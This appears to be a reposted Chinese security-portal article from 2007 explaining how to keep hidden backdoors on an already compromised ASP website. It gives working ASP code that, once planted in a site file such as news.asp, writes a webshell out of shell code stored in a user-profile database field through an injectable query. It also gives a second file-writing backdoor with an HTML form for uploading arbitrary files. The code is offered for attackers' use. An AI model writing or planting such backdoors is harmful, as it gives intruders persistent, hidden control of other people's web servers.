华信知识服务平台
首页 业界快讯 会议活动 培训信息 专家专栏 每周病毒播报 安全小百科 图书专区 网络营销 定制出版 Intel
Google 在互联网上找 在站内找
安全会议
 
  2008全球数字监控论坛(2008-7-2)
 
  2008年全国信息安全类专业学生创新能力培养研讨会(2008-7-11)
 
  全国“信息安全实验”课程教学经验交流暨师资培训会议(2008-7-14)
 
  全国第19届计算机技术与应用(CACIS2008)学术会议(2008-7-15)
 
  more
每周病毒播报
 

病毒预报 第二百八十四期(2008.7.14-2008.7.20)
 
 

病毒预报 第二百八十三期(2008.7.7-2008.7.13)
 
 

病毒预报 第二百八十二期(2008.6.30-2008.7.6)
 
 

病毒预报 第二百八十一期(2008.6.23-2008.6.29)
 
 

病毒预报 第二百八十期(2008.6.16-2008.6.22)
 
 

病毒预报 第二百七十九期(2008.6.9-2008.6.15)
 
  more
邮件订阅每周病毒播报
E-mail:
 
信息安全系列培训
软件安全系列培训——安全编程(2008-3-29)
“网站安全保护”培训课程
(每月一期)
“企业网络与信息安全”培训课程(2008年6月前每月一期)
 
资源导航
 
巧妙利用.mdb后缀数据库做后门  
  来源:安全中国 更新时间:2007-11-15  
 

引言:好长时间了,从刚开始的站点管理器到现在流行的几款asp后门,相信大多网管都能说出这些经典webshell的名字,如海洋、老兵、蓝屏等,也相信大多数的网管学会了关键字的搜索方法来搜索这些木马,当然现在的时间如果再象隐藏后门就要讲些技巧啦,俗话说的好“佛高一尺,我高一丈”。

我不否认n早前的那个把asp木马写到图片文件中不失为一种好的方法,其实不仅可以写到图片啦 写到mp3文件里写到doc文件里都是可以的啦
copy 文件名/参数 + 文件名/参数 生成文件名

这样的方法可以很灵活的运用来达到隐藏文件的目的,具体的参数就是/a以acsic码方式,/b二进制方式,就不罗嗦这些了,至于如何上传 webshell,什么是webshell也不属于本文的讨论范围。今天要讲的是如何把后门放到后缀.mdb的数据库中,前提是在我们拿到

一个webshell之后...

我们所知道的,很多站点在用户注册的时候要让填好多东西例如:
用户名、密码、QQ、邮箱、个人简介、电话、联系方式、住址一类的
而对应到数据库中也都会有相应的表 字段 值
我今天要做的就是 我注册一个用户在 我的个人简介的地方上写入shell代码,然后修改他站点上的一个文件,使用的时候触发这个文件,就把我个人简历中的shell代码,备份到当前目录下
废话少说了 大家看代码
<%
if request("action")="firefox" then
fname=request.querystring("fn")
tname=request.querystring("tn")
bname=request.querystring("bn")
id=request.querystring("id")
idvalue=request.querystring("idv")
set rs=server.createobject("ADODB.recordset")
sql="select "& bname & " from "&tname& " where "&id&"="&idvalue&""""
rs.open sql,conn,1,3
if not rs.eof then
content=rs(bname)
else
response.write "Nothing"
end if
set fso=Server.CreateObject("Scripting.FileSystemObject")
set txtfile=fso.createtextfile(server.mappath(fname))
txtfile.writeline(content)
txtfile.close
end if
%>

将上边的代码加到站点的一个文件中 如news.asp

根据我们了解的信息 在其站点注册后 下载数据库看结构

我注册的firefox名字是在 user表 其id值为119 用于存放我注册简历的表字段为jl

那么在使用的时候我们

news.asp?action=firefox&fn=firefox.asp&tn=user&bn=jl&id=id&idv=119

就可以在news.asp相同目录下写入一个名为 firefox.asp的webshell

以上可以说是万千隐藏方法中的一种 下边再说另外一种更方便的隐藏方法

这个方法就和mdb后缀无关系了

同样我们还是修改news.asp 将以下代码插入到对方news.asp中
<%
if request("action")="firefox" then
n=request.form("n")
c=request.form("c")
set fso=Server.CreateObject("Scripting.FileSystemObject")
set txtfile=fso.createtextfile(server.mappath(n))
txtfile.writeline(c)
txtfile.close
end if
%>

这段代码相对简单些 算是一个木马的服务端吧

使用的时候以这段代码配合
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<title>F.s.t火狐技术联盟[www.wrsky.com]</title>
<FORM action="http://localhost/config.asp?action=firefox" method=post>
<META content="MSHTML 6.00.2900.2180" name=GENERATOR></HEAD>
<BODY>Name:<INPUT size=50
name=n width="32"><BR><BR>Shell:<TEXTAREA name=c rows=10 cols=80

width="32"></TEXTAREA><INPUT type=submit value=Save></FORM></BODY></HTML>

将以上代码中的

http://localhost/config.asp?action=firefox

替换成你的服务端地址
然后保存为本地的.htm文件

本地打开后定义要生成的文件名 文件内容 远程提交 ok 又是一种留后门的方法。

  
  返回应用与技巧首页>>  
信息安全系列培训听众登记表

    如果您对我们的培训有兴趣,请完整填写下表并提交
    ——您将有机会免费获得电子工业出版社图书一本。

    有相关问题也可通过以下联系方式咨询
    ①电话咨询:010-88254012;联系人:潘昕
    ②传真:010-88254490
    ③电子邮件:panxin@phei.com.cn

信息安全系列培训听众登记表(*为必填项)
 *姓   名:  * E-mail:
 办公电话:  手    机:
 邮寄地址:  邮政编码:
 感兴趣的课程(可多选):
  企业网络与信息安全   网站安全保护
  院校老师办公安全意识与技能培训  


关于本站|联系我们|业界快讯|会议活动|培训信息|专家专栏|病毒播报|安全百科|图书专区|应用技巧|安全学堂